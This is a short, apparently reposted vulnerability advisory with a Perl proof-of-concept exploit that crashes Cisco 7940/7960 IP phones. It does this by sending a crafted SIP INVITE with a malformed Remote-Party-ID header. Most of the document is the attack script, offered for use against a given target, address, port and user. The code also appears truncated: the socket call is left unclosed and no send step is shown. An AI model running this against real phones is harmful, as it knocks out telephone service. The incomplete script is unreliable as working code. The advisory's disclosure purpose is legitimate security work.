Cisco 7940 SIP INVITE remote DOS
来源 作者:Humberto 发布时间:2007-03-21
#!/usr/bin/perl # Title: Cisco 7940 SIP INVITE remote DOS # Date: February 19, 2007 # ID: KIPH2 # # Synopsis: After sending a cra fted INVITE message the device immediately # reboots. The phone does not check properly the sipURI field of the # Remote-Party-ID in the message. # # The vendor was informed and acknowledged the vulnerability. This # vulnerability was identified by the Madynes research team at INRIA # Lorraine, using the Madynes VoIP fuzzer. # # Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol # for VoIP signalization. SIP is an ASCII based INVITE message is used to # initiate and maintain a communication session. # # Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00 # # Unaffected: devices running firmware POS8-6-0 # # Description: After receiving one crafted SIP INVITE message, the # affected device reboots immediately. The proof of concept code can be # used to demonstrate the vulnerability. # # Resolution: # # Fixed software is available from the vendor and customers following # recommended best practices (ie segregating VOIP traffic from data) will # be protected from malicious traffic in most situations. # # Credits: # # Humberto J. Abdelnur (Ph.D Student) # # Radu State (Ph.D) # # Olivier Festor (Ph.D) # # This vulnerability was identified by the Madynes research team at INRIA # # Lorraine, using the Madynes VoIP fuzzer. # #
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP;branch=z9hG4jk\r\nFrom: sip:chirimolla \@;tag=qwzng\r\nTo: <sip:$ARGV[2]\@$ARGV[0];user=ip>\r \nCall-ID: fosforito\@\r\nCSeq: 921 INVITE\r \nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";
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